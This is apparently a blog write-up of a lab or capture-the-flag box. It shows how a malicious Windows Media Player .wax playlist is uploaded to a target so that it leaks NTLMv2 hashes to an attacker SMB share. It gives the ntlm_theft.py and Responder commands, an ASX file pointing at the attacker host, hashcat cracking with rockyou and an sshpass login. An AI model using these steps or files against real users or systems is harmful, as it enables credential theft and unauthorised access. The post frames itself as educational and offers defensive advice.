Post

NTLM Hash Capture via Legacy WAX File Bypass

NTLM Hash Capture via Legacy WAX File Bypass

NTLM Hash Capture via Legacy WAX File - Lab Demonstration

This lab scenario explores the capture of NTLMv2 hashes using a legacy WAX file combined with Responder for hash poisoning. The technique demonstrates a POC (proof of concept) approach that, while effective in controlled environments, may have varying real world applicability depending on target configurations and security controls. There was a option to upload a Windows Media Player file through the Web GUI. This method could potentially be useful in red teaming engagements where legacy systems are present.

Attack Flow

1. Weaponized File Creation

The ntlm_theft.py tool generates multiple attack vectors including the redteam.wax file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
python3 ntlm_theft.py -g all -s 10.10.10.10 -f redteam
/home/kali/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
  location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: redteam/redteam.scf (BROWSE TO FOLDER)
Created: redteam/redteam-(url).url (BROWSE TO FOLDER)
Created: redteam/redteam-(icon).url (BROWSE TO FOLDER)
Created: redteam/redteam.lnk (BROWSE TO FOLDER)
Created: redteam/redteam.rtf (OPEN)
Created: redteam/redteam-(stylesheet).xml (OPEN)
Created: redteam/redteam-(fulldocx).xml (OPEN)
Created: redteam/redteam.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: redteam/redteam-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: redteam/redteam-(includepicture).docx (OPEN)
Created: redteam/redteam-(remotetemplate).docx (OPEN)
Created: redteam/redteam-(frameset).docx (OPEN)
Created: redteam/redteam-(externalcell).xlsx (OPEN)
Created: redteam/redteam.wax (OPEN)
Created: redteam/redteam.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: redteam/redteam.asx (OPEN)
Created: redteam/redteam.jnlp (OPEN)
Created: redteam/redteam.application (DOWNLOAD AND OPEN)
Created: redteam/redteam.pdf (OPEN AND ALLOW)
Created: redteam/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: redteam/redteam.library-ms (BROWSE TO FOLDER)
Created: redteam/Autorun.inf (BROWSE TO FOLDER)
Created: redteam/desktop.ini (BROWSE TO FOLDER)
Created: redteam/redteam.theme (THEME TO INSTALL
Generation Complete.

2. NTLM Hijacking via .WAX

The Greenwolf/ntlm_theft repository was used as a reference for generating test files in a controlled lab environment.

3. Responder setup

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
Responder is initiated on the tun0 interface to capture authentication attempts:

responder -I tun0  
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [OFF]
    IMAP server                [OFF]
    POP3 server                [OFF]
    SMTP server                [OFF]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [OFF]
    RDP server                 [OFF]
    DCE-RPC server             [OFF]
    WinRM server               [OFF]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.10.10]
    Responder IPv6             [dead:beef:2::10cd]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-VVA6SP3PVXI]
    Responder Domain Name      [OUZ4.LOCAL]
    Responder DCE-RPC Port     [48236]

[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <[email protected]>
[*] To sponsor Responder: https://paypal.me/PythonResponder

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.1.1.1
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash     : SNIP
[*] Skipping previously captured hash for MEDIA\enox
[*] Skipping previously captured hash for MEDIA\enox
[+] Exiting...

4. Hash capture

The redteam.wax file was uploaded via the web GUI and, when processed/previewed by the target, the authentication listener recorded an NTLMv2 authentication exchange.

1
2
3
4
5
6
7
8
9
10
11
Target interaction with the WAX file results in NTLMv2 hash capture:

SMB] NTLMv2-SSP Client   : 10.10.10.1
<SNIPPED GOT THE HASH>

Then saved the captured hash as enox.hash and cracked it by using hashcat.

hashcat enox.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 


5. Logged in using sshpass

1
2
sshpass -p 'THECRACKEDPASSWORD' ssh [email protected]

6. Note on .wax files

.wax files are audio shortcuts for Windows Media Player. When opened with Windows Media Player they may attempt to fetch a media stream from a server specified in the file and may initiate an authentication exchange if the remote resource requires it. This behavior is one reason legacy playlist formats remain relevant to defensive testing.

Example WAX (ASX) content:

1
2
3
4
5
6
7
<asx version="3.0">
    <title>TESTING</title>
    <entry>
        <title></title>
        <ref href="file://10.10.10.10\test\TEST.mp3"/>
    </entry>
</asx>

Credit: an analysis and example of this technique is available at 0xdf: HTB Media writeup.

7. Conclusion

This lab showed that a legacy file format such as .WAX can be turned into a practical test of modern defenses. In a controlled environment the WAX file repeatedly caused an endpoint to initiate an outbound NTLMv2 authentication exchange that revealed authentication metadata. That behavior highlights how older handlers and automatic retrieval mechanisms remain an underrated attack surface.

For red teams this provides a quiet but effective tool for social engineering and client side testing. A small user action, such as previewing or opening a media file, can trigger protocol level behavior with real consequences. Use of this approach must be strictly authorised, carefully scoped, and fully documented to avoid real world harm.

For defenders the message is simple. Limit legacy protocol egress, harden client policies to reduce automatic retrieval of remote content, and tune detection to link file open or preview events with outbound NTLM activity. Those steps will greatly reduce the odds that a routine media file becomes a pathway for credential exposure.

Ultimately legacy formats still matter. They can produce high impact, low visibility checks of network segmentation, endpoint configuration, and detection maturity when used responsibly and with appropriate safeguards.

Disclaimer: This article is for educational purposes only and details a Proof of Concept (POC) technique. This information should only be used in authorized penetration testing, bug bounty programs, or approved red teaming engagements. The author and publisher are not responsible for any misuse of this information.

This technique can be applied in penetration testing or red teaming engagements.

This post is licensed under CC BY 4.0 by the author.